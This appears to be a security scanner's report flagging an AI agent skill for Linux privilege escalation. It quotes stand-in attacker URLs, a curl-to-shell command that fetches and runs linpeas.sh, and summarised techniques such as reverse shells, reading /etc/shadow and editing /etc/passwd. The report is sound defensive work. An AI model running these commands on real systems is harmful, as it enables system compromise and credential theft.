Linux Privilege Escalation

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 1.00). While GTFOBins and the cited GitHub projects are known legitimate resources, the list includes direct HTTP links to attacker-controlled hosts serving raw executables/scripts (e.g., http://ATTACKER_IP:8000/linpeas.sh and http://ATTACKER_IP/exploit.c), which are high-risk vectors for malware and unauthorized code execution.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is a high-risk offensive guide that directly instructs on privilege escalation, remote code execution (reverse shells), credential theft (reading /etc/shadow), persistence, and other system compromise techniques, and thus clearly enables malicious activity.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill instructs the agent to download and execute tools and exploits from public/untrusted sources—e.g., curl/wget from GitHub (linpeas), links to GTFOBins and exploit-db/searchsploit, and arbitrary attacker-hosted URLs like http://ATTACKER_IP/exploit.c—so it clearly ingests untrusted third-party content as part of its workflow.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill explicitly runs a runtime fetch-and-execute command (curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh) which downloads and executes remote code (linpeas.sh), so this URL is a runtime dependency that directly executes remote code.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly instructs enumeration and exploitation techniques to obtain root (compile/execute kernel exploits, create SUID binaries, modify /etc/passwd and cron scripts, add users, and launch reverse shells), which directs the agent to modify the machine's state and bypass security controls.